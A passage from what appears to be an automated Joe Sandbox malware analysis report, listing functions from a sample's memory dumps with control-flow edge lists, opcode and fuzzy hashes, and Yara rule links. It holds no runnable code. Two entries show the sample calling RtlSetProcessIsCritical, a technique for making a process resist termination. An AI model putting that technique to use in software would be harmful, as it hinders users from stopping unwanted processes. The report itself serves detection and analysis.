                            • Opcode ID: fc0f4dd0da460f4b52c0f6917985706e4eee0fd8ee5d08990f6f3720e5dc53e7
                            • Instruction ID: 6828cfc6ad79f3354402aeb2da40a8c273633286c3f98c2d1359843c3355da2f
                            • Opcode Fuzzy Hash: fc0f4dd0da460f4b52c0f6917985706e4eee0fd8ee5d08990f6f3720e5dc53e7
                            • Instruction Fuzzy Hash: 10415A75C092989FDB01CFA9D841BEEBFF4AF0A310F0480AAE854B7251D3389A45CF65
                            Function 0151E170 Relevance: 1.7, Strings: 1, Instructions: 463COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 906 151e170-151e182 907 151e184-151e1a5 906->907 908 151e1ac-151e1b0 906->908 907->908 909 151e1b2-151e1b4 908->909 910 151e1bc-151e1cb 908->910 1007 151e1b6 call 151e140 909->1007 1008 151e1b6 call 151e170 909->1008 1009 151e1b6 call 151e160 909->1009 911 151e1d7-151e203 910->911 912 151e1cd 910->912 916 151e424-151e46f 911->916 917 151e209-151e20f 911->917 912->911 948 151e471 916->948 949 151e485-151e491 916->949 919 151e215-151e21b 917->919 920 151e2d8-151e2dc 917->920 919->916 924 151e221-151e230 919->924 921 151e301-151e30a 920->921 922 151e2de-151e2e7 920->922 926 151e30c-151e32c 921->926 927 151e32f-151e332 921->927 922->916 925 151e2ed-151e2ff 922->925 928 151e2b7-151e2c0 924->928 929 151e236-151e242 924->929 930 151e335-151e33b 925->930 926->927 927->930 928->916 932 151e2c6-151e2d2 928->932 929->916 933 151e248-151e25f 929->933 930->916 937 151e341-151e356 930->937 932->919 932->920 934 151e261 933->934 935 151e26b-151e27d 933->935 934->935 935->928 943 151e27f-151e285 935->943 937->916 939 151e35c-151e36e 937->939 939->916 942 151e374-151e381 939->942 942->916 945 151e387-151e39e 942->945 946 151e291-151e297 943->946 947 151e287 943->947 945->916 955 151e3a4-151e3bc 945->955 946->916 951 151e29d-151e2b4 946->951 947->946 952 151e474-151e476 948->952 953 151e493 949->953 954 151e49d-151e4b9 949->954 956 151e478-151e483 952->956 957 151e4ba-151e4f7 952->957 953->954 955->916 958 151e3be-151e3c9 955->958 956->949 956->952 967 151e513-151e51f 957->967 968 151e4f9-151e4fc 957->968 960 151e3cb-151e3d5 958->960 961 151e41a-151e421 958->961 960->961 966 151e3d7-151e3ed 960->966 974 151e3f9-151e412 966->974 975 151e3ef 966->975 970 151e521 967->970 971 151e52b-151e550 967->971 969 151e4ff-151e511 968->969 969->967 969->969 970->971 978 151e552-151e558 971->978 979 151e5c4-151e5ca 971->979 974->961 975->974 978->979 982 151e55a-151e55d 978->982 980 151e617-151e631 979->980 981 151e5cc-151e5cf 979->981 984 151e5d1-151e5de 981->984 985 151e634-151e659 981->985 982->985 986 151e563-151e570 982->986 987 151e611-151e615 984->987 988 151e5e0-151e5f8 984->988 997 151e667-151e66b 985->997 998 151e65b-151e661 985->998 990 151e572-151e59c 986->990 991 151e5be-151e5c2 986->991 987->980 987->981 988->985 992 151e5fa-151e60d 988->992 993 151e5a8-151e5bb 990->993 994 151e59e 990->994 991->979 991->982 992->987 993->991 994->993 999 151e691-151e696 997->999 1000 151e66d-151e67d 997->1000 1002 151e663 998->1002 1003 151e665 998->1003 1000->999 1005 151e67f-151e690 1000->1005 1002->997 1003->997 1007->910 1008->910 1009->910
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: 4247860fac2cb94a6fae442f348e1e35b23b62f12dd4678fba15bfa7d2e49f8c
                            • Instruction ID: 3596bc8370df65883193f1aa6d7b787d1445a39f592c318874e55ea6bc6b2078
                            • Opcode Fuzzy Hash: 4247860fac2cb94a6fae442f348e1e35b23b62f12dd4678fba15bfa7d2e49f8c
                            • Instruction Fuzzy Hash: 61029E346006068FE726CF59C480A6AFBF2FF88314B55C669D9599B766DB30FC41CB90
                            Function 05537584 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1160 5537584-553a65f RtlSetProcessIsCritical 1163 553a661 1160->1163 1164 553a666-553a69f 1160->1164 1163->1164
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: 84e3262c7d559bd07ec3c59144143e7b6795c38219aea8e26864ab0b2a92c86f
                            • Instruction ID: 5ad41d47471ad9e03e54da6adf86297be9b406c155a91d0541736a3cb6f8af04
                            • Opcode Fuzzy Hash: 84e3262c7d559bd07ec3c59144143e7b6795c38219aea8e26864ab0b2a92c86f
                            • Instruction Fuzzy Hash: 0331D0B5D04258DFDB10CFAAD441AEEFBF5AB09310F14906AE858B7251D338AA45CF64
                            Function 0553A541 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1167 553a541-553a5d8 1169 553a5e0-553a65f RtlSetProcessIsCritical 1167->1169 1170 553a661 1169->1170 1171 553a666-553a69f 1169->1171 1170->1171
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: 50e55c05c0b46a306dc6f8e85a907737006eb69d56777878f407d8cbea989a7d
                            • Instruction ID: 83e89992ab23ac7b5dc284f228e701a914871ffde68399367fb94525f623cf36
                            • Opcode Fuzzy Hash: 50e55c05c0b46a306dc6f8e85a907737006eb69d56777878f407d8cbea989a7d
                            • Instruction Fuzzy Hash: CE31ABB9D04259CFDB00CFAAD481AEDFBF5AF09310F14906AE858B3251D378AA45DF64
                            Function 01519458 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1174 1519458-151946b 1175 1519477-151949c 1174->1175 1176 151946d-151946f 1174->1176 1178 15194a2-15194a7 1175->1178 1179 15195ef-151963f 1175->1179 1176->1175 1180 1519501-1519506 1178->1180 1181 15194a9 1178->1181 1182 1519526-151952f 1180->1182 1183 1519508-1519511 1180->1183 1184 15194ac-15194af 1181->1184 1187 1519531-1519545 1182->1187 1188 1519548-151954e 1182->1188 1183->1179 1186 1519517-1519524 1183->1186 1184->1179 1189 15194b5-15194c1 1184->1189 1190 1519551-151955a 1186->1190 1187->1188 1188->1190 1191 15194c3-15194cd 1189->1191 1192 15194e4-15194ed 1189->1192 1190->1179 1196 1519560-1519588 1190->1196 1198 15194d6-15194d8 1191->1198 1192->1179 1194 15194f3-15194ff 1192->1194 1194->1180 1194->1184 1196->1179 1197 151958a-15195a8 1196->1197 1200 15195e2-15195ee 1197->1200 1201 15195aa-15195b4 1197->1201 1198->1192 1202 15194da-15194e3 1198->1202 1201->1200 1206 15195b6-15195da 1201->1206 1206->1200
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: 7f9fa221a4424576e2bb805f1d3fbbbf0e5e9857493959ad8107ecd6ec6e4d44
                            • Instruction ID: ed30e58fb0fdc21a80fe6e0153d5e3eb25e5de25edd7fb5b488f1dae60f8fb58
                            • Opcode Fuzzy Hash: 7f9fa221a4424576e2bb805f1d3fbbbf0e5e9857493959ad8107ecd6ec6e4d44
                            • Instruction Fuzzy Hash: 15618974A00606CFCB16DF59C5C08AAF7B6FF88314715C669C959AB61ADB30FC51CBA0
                            Function 01515260 Relevance: 1.4, Instructions: 1392COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1211 1515260-151528c 1213 15152fd-1515301 1211->1213 1214 151528e-15152ad call 1515238 1211->1214 1218 15152cf-15152db 1214->1218 1219 15152af 1214->1219 1220 15152dd-15152ed 1218->1220 1221 15152ef-15152f3 1218->1221 1222 15152b4-15152bc 1219->1222 1220->1221 1221->1213 1223 1515302-1516d73 1222->1223 1224 15152be-15152c2 1222->1224 1226 15152ca-15152cd 1224->1226 1226->1218 1226->1222
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4319717edb9ad95bc102d52bc02cb7acc426b990068de4258ab01766327adf6
                            • Instruction ID: ab75c37efef1badb957189aff88a702a24d671c11f529d1e9c4686ba42e9e6f0
                            • Opcode Fuzzy Hash: a4319717edb9ad95bc102d52bc02cb7acc426b990068de4258ab01766327adf6
                            • Instruction Fuzzy Hash: 82E2F734A51219EBEB14EF50EC94BAD7776FF89340F1088A8D90A2B394CB356E85CF51
                            Function 0151F2C8 Relevance: .5, Instructions: 503COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1869 151f2c8-151f320 call 151f070 1874 151f322-151f324 1869->1874 1875 151f326-151f32a 1869->1875 1876 151f330-151f353 1874->1876 1875->1876 1881 151f355-151f35a 1876->1881 1882 151f35f-151f36b 1876->1882 1883 151f43b-151f441 1881->1883 1887 151f36d-151f399 call 151e970 1882->1887 1888 151f39e-151f3aa 1882->1888 1884 151f443 1883->1884 1885 151f447-151f467 1883->1885 1884->1885 1900 151f473-151f488 1885->1900 1901 151f469-151f46e 1885->1901 1887->1883 1893 151f3b6-151f3ca 1888->1893 1894 151f3ac-151f3b1 1888->1894 1904 151f436 1893->1904 1905 151f3cc-151f3ee 1893->1905 1894->1883 1913 151f50b 1900->1913 1914 151f48e-151f49e 1900->1914 1903 151f510-151f51e 1901->1903 1911 151f520-151f524 1903->1911 1912 151f536-151f542 1903->1912 1904->1883 1925 151f3f0-151f412 1905->1925 1926 151f414-151f42d 1905->1926 1917 151f52c-151f52e 1911->1917 1918 151f626-151f65a 1912->1918 1919 151f548-151f564 1912->1919 1913->1903 1922 151f4a0-151f4b0 1914->1922 1923 151f4b2-151f4b7 1914->1923 1917->1912 1940 151f672-151f674 1918->1940 1941 151f65c-151f670 1918->1941 1934 151f612-151f620 1919->1934 1922->1923 1932 151f4b9-151f4c9 1922->1932 1923->1903 1925->1904 1925->1926 1926->1904 1942 151f42f-151f434 1926->1942 1945 151f4d2-151f4e2 1932->1945 1946 151f4cb-151f4d0 1932->1946 1934->1918 1937 151f569-151f572 1934->1937 1943 151f831-151f858 1937->1943 1944 151f578-151f58b 1937->1944 1947 151f6a4-151f6e4 1940->1947 1948 151f676-151f688 1940->1948 1941->1940 1942->1883 1961 151f8ec-151f93d 1943->1961 1962 151f85e-151f860 1943->1962 1944->1943 1949 151f591-151f5a3 1944->1949 1955 151f4e4-151f4e9 1945->1955 1956 151f4eb-151f4fb 1945->1956 1946->1903 2036 151f6e6 call 151ff18 1947->2036 2037 151f6e6 call 151ff28 1947->2037 1948->1947 1963 151f68a-151f69c 1948->1963 1964 151f5a5-151f5b1 1949->1964 1965 151f60f 1949->1965 1955->1903 1970 151f504-151f509 1956->1970 1971 151f4fd-151f502 1956->1971 2001 151f94d-151f957 1961->2001 2002 151f93f-151f94c 1961->2002 1962->1961 1968 151f866-151f868 1962->1968 1963->1947 1964->1943 1969 151f5b7-151f60c 1964->1969 1965->1934 1968->1961 1973 151f86e-151f872 1968->1973 1969->1965 1970->1903 1971->1903 1973->1961 1977 151f874-151f878 1973->1977 1976 151f6ec-151f700 1990 151f702-151f719 1976->1990 1991 151f747-151f75e 1976->1991 1979 151f88a-151f8cc call 151a1f8 1977->1979 1980 151f87a-151f888 1977->1980 1989 151f8d4-151f8e9 1979->1989 1980->1989 2007 151f727-151f73f call 151e970 1990->2007 2008 151f71b-151f725 1990->2008 2003 151f766-151f794 1991->2003 2009 151f966-151f96c 2001->2009 2010 151f959-151f964 2001->2010 2018 151f796-151f7af 2003->2018 2019 151f7e8-151f7ff 2003->2019 2007->1991 2008->2007 2020 151f96e-151f9b4 2009->2020 2010->2020 2025 151f7b1 2018->2025 2026 151f7b9-151f7e5 2018->2026 2027 151f801-151f81c 2019->2027 2028 151f825-151f82e 2019->2028 2025->2026 2026->2019 2027->2028 2036->1976 2037->1976
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2386e05268bb4a43624228ddc6c375f2c2e9cffefed890505533738c3d494e07
                            • Instruction ID: 8ad03e99d204ec41e02f8a309401cf66fb820ec9c287f77a06e2b1d23cfc2c4b
                            • Opcode Fuzzy Hash: 2386e05268bb4a43624228ddc6c375f2c2e9cffefed890505533738c3d494e07
                            • Instruction Fuzzy Hash: EB1227747006058FEB16DF29C488A6EBBF2FF89300B1544AAE506DB366DB35EC46CB51
                            Function 06B5126D Relevance: .4, Instructions: 374COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89d93bb8c6957e26fc0c13ea1705f6c50f7963348be5288d9893c697439e50e6
                            • Instruction ID: 82d6127e650eac3fc68c9e1bfd00f9f97e3b7e1efcd12966ece98844592e17e5
                            • Opcode Fuzzy Hash: 89d93bb8c6957e26fc0c13ea1705f6c50f7963348be5288d9893c697439e50e6
                            • Instruction Fuzzy Hash: F1F1F4B4D00219CFEB60DFA8C885BDDBBF1BF49304F1095AAD809A7290EB749985CF55
                            Function 01518C80 Relevance: .3, Instructions: 280COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8fe89fd9e64274fb7fcf488669e1e04b8c4eff118ed4d7c7dedc50dc10f5ac4
                            • Instruction ID: fded66cc1a76c63c452cfca20a3cc32c1148070db548c3f6ff28b083751682aa
                            • Opcode Fuzzy Hash: c8fe89fd9e64274fb7fcf488669e1e04b8c4eff118ed4d7c7dedc50dc10f5ac4
                            • Instruction Fuzzy Hash: 68A12E315093418FE313DB34D8946AA7BF2FF96220749499BC085CF3A6DB34AD0AC752
                            Function 01514F18 Relevance: .2, Instructions: 238COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d783146427f4685decf928b295b7b425ca6bdbef2b0c8d12b665b0a104ac1b6
                            • Instruction ID: 90dededc20f4f0ae7e9c0a8411f3d80eabc18ce40b0f3e2641a17313102ae6d8
                            • Opcode Fuzzy Hash: 4d783146427f4685decf928b295b7b425ca6bdbef2b0c8d12b665b0a104ac1b6
                            • Instruction Fuzzy Hash: 03A15A746003029FC715EF64D8849AEB7F2FF89310B158A98D44A9B766DB30FD4ACB91
                            Function 01514F28 Relevance: .2, Instructions: 230COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 371c4a385db32a2d611760f273d655323226087647d90d119fc44ff1ab556f2b
                            • Instruction ID: 4db35ca8f3f48249c76cc242a4591333860ac70e3cb593e86af3b5f16eb22aa9
                            • Opcode Fuzzy Hash: 371c4a385db32a2d611760f273d655323226087647d90d119fc44ff1ab556f2b
                            • Instruction Fuzzy Hash: 67A159746003069FC715EF64D4849AAB7F2FF88310B148A98D44A9B766DB30FD4ACB91
                            Function 06B521CB Relevance: .2, Instructions: 208COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f2093e102229c46629f4110bf0839076b1b98a16b806766b3c470fbcad3e6b9
                            • Instruction ID: 88ef08475f9db76dcd6169282117339f4034d511e3e44acd99f4cc71adb4ccad
                            • Opcode Fuzzy Hash: 5f2093e102229c46629f4110bf0839076b1b98a16b806766b3c470fbcad3e6b9
                            • Instruction Fuzzy Hash: 4191D874E15248CFDB55CFA9D494A9DBBF2BF4A300F2591AAD805AB366DB319C01CF10
                            Function 01511382 Relevance: .2, Instructions: 202COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9e82e7162903f55b136a39618f6a19478b3a1fda55b5a618d59276b75ec1dcd
                            • Instruction ID: d53d4e4f4eb10bb00ed9b5f69467d2da1965904313bd23057099d144c2d05555
                            • Opcode Fuzzy Hash: a9e82e7162903f55b136a39618f6a19478b3a1fda55b5a618d59276b75ec1dcd
                            • Instruction Fuzzy Hash: 2FA18174E01219DFEB64DF64E858BADBBB2FB88300F1085A9D90A67394DB345E85CF50
                            Function 06B53560 Relevance: .2, Instructions: 197COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6b9caf994eecb8eb64297cb0bb2a7d1ba976e8ac2f3edd3536d3e3201a7c78f
                            • Instruction ID: 5561017ee3c4760b0da44b8c22e4c594d102d14f288964958d74f7ea4b369d9f
                            • Opcode Fuzzy Hash: b6b9caf994eecb8eb64297cb0bb2a7d1ba976e8ac2f3edd3536d3e3201a7c78f
                            • Instruction Fuzzy Hash: CE915074E00218CFDB54DFA9D994A9DBBF2BF89300F219169E819AB365DB31A841CF50
                            Function 01511A81 Relevance: .2, Instructions: 188COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35e51c486abf606ebc74f6abca205696feb4274a13cb1e406ceb4a0abd0c1b83
                            • Instruction ID: a9bcfb3fc8b9450686de78e733debd58ac6c09b9c8248800e233f6c95e5aab56
                            • Opcode Fuzzy Hash: 35e51c486abf606ebc74f6abca205696feb4274a13cb1e406ceb4a0abd0c1b83
                            • Instruction Fuzzy Hash: 93A18474A01219DFEB64DF64E898BADBBB2FB48300F1085A9D90E67354DB34AD81CF50
                            Function 06B52200 Relevance: .2, Instructions: 179COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19c5a95d2b26079efba77f7d9e94c4484b72b666239ad0a8b927ee9e697f00d1
                            • Instruction ID: 713e3c331ddd0f8cafff4cf42cb92464d8f920165b05abdb0cb925131e74c444
                            • Opcode Fuzzy Hash: 19c5a95d2b26079efba77f7d9e94c4484b72b666239ad0a8b927ee9e697f00d1
                            • Instruction Fuzzy Hash: 25816E74E10218CFDB54DFA9D594A9DBBF2BF89300F219169E819AB365DB31A801CF50
                            Function 01518D97 Relevance: .2, Instructions: 169COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f806337e5eca243efb240056377e131809ee64c7930338fa6555edd6ae9e9e8a
                            • Instruction ID: 8fbbf0a201dc3e17b4c47eef6544461674711bfde41f14c15a415de4821ebfdc
                            • Opcode Fuzzy Hash: f806337e5eca243efb240056377e131809ee64c7930338fa6555edd6ae9e9e8a
                            • Instruction Fuzzy Hash: 3A51F4316053019FD316EB34D8946AA77F2FF8A310B44896DD1468B3A5DB35FC0ACB92
                            Function 01511E6B Relevance: .2, Instructions: 167COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0932c1bb97d88694737b4824d1e32179752f8b52eeea516275af6a429208e0aa
                            • Instruction ID: bf8140aeec43c3c3bc3081f34506968e72d8f301273aaf70d412387ea5f4f836
                            • Opcode Fuzzy Hash: 0932c1bb97d88694737b4824d1e32179752f8b52eeea516275af6a429208e0aa
                            • Instruction Fuzzy Hash: B161F075D01209CFDB05DFA8D484AECBBF6FF89300F209669D505AB269D731AA85CB50
                            Function 01510A40 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 682827f6f934b558c148c26f943be024198bd2cbc14bd8b229f999acac9fd29d
                            • Instruction ID: 93266bd399baa467852e482b90b255e8368510cfedecb284895c4b101b6281d5
                            • Opcode Fuzzy Hash: 682827f6f934b558c148c26f943be024198bd2cbc14bd8b229f999acac9fd29d
                            • Instruction Fuzzy Hash: 4F61D274A01208DFDB05DFA9D584AEDBBF6FF89310F208529E405AB2A9DB34AD41CF50
                            Function 06B540B0 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5039f33480e9641cf51cf6847f0f8eb86e03ccc0c3437e0f599fe1f2179b60cc
                            • Instruction ID: bf64baf766f2de2b969613c9560fdcf858d98aa2a78918c89a8cb737fb37a794
                            • Opcode Fuzzy Hash: 5039f33480e9641cf51cf6847f0f8eb86e03ccc0c3437e0f599fe1f2179b60cc
                            • Instruction Fuzzy Hash: 11511874E01208DFDB18DFA5E494BEDBBB2FF49304F209469D401BB294CB799886CB50
                            Function 06B52A50 Relevance: .1, Instructions: 135COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4254a10fee2cd8d73985445f2d39bedd9094f3a99ddbfa7e469913e96f4ea772
                            • Instruction ID: bb372a61cdf510fb1f7a481d982dff672d7c5c57d2cd633b5b7adcf83d0484a3
                            • Opcode Fuzzy Hash: 4254a10fee2cd8d73985445f2d39bedd9094f3a99ddbfa7e469913e96f4ea772
                            • Instruction Fuzzy Hash: 2151E574E01208DFDB54CFAAD888A9DBBF2FF89300F149469E805AB364CB709945CF54
                            Function 01517388 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0bbd978c8db067464a3a3cd8d99ac93e0965cac78318ea6f49d637fee944ce2
                            • Instruction ID: bed2dbf04d10337cecaaf0884bddc9a0b61c18868933030aa3961b78d6284212
                            • Opcode Fuzzy Hash: c0bbd978c8db067464a3a3cd8d99ac93e0965cac78318ea6f49d637fee944ce2
                            • Instruction Fuzzy Hash: A5516D70A0020A8FDB11DF58D880AAEBBF6FF88310F58C969D5499B255D771ED06CBA1
                            Function 01517990 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: afd7b284f0e0aaf99c2702f86dd80376e754746cb579dd2c75f8928ee2bc94a8
                            • Instruction ID: c09f57862dcdd15113e91ab5fe2a8d0f512efd4dfed07bb2e3c3215ab2815b43
                            • Opcode Fuzzy Hash: afd7b284f0e0aaf99c2702f86dd80376e754746cb579dd2c75f8928ee2bc94a8
                            • Instruction Fuzzy Hash: 6E417D716117009FE316EB25D880B9AB7E2FF85360F858E58C1468F652DBB0F948CB96
                            Function 06B52A60 Relevance: .1, Instructions: 127COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa000140dd8e5852d620db818090d1e35c64d8c9da50fd724cea8245e026ff09
                            • Instruction ID: 03579d1a00da22d775f5e7f9efd0b9b5d9fbf13e64500a21e3b7a8b30c26f8ec
                            • Opcode Fuzzy Hash: aa000140dd8e5852d620db818090d1e35c64d8c9da50fd724cea8245e026ff09
                            • Instruction Fuzzy Hash: 8151C174E01208DFDB48DFAAD988A9DBBF2FF89300F149069E805AB364DB749945CF54
                            Function 01512688 Relevance: .1, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9985cdfed0b8b9db40a0c4452a5a12326e6025adc6b10db6a330f3c7d1632273
                            • Instruction ID: 5eb1e98fc5aa156bb7f89559c625c45556045c508e45b52cf3c8a2a425945fac
                            • Opcode Fuzzy Hash: 9985cdfed0b8b9db40a0c4452a5a12326e6025adc6b10db6a330f3c7d1632273
                            • Instruction Fuzzy Hash: E441AF74E02209EFDB09DFB9D454AADB7B2BF89300F208469E80577394CB3A9D42CB55
                            Function 01512C30 Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
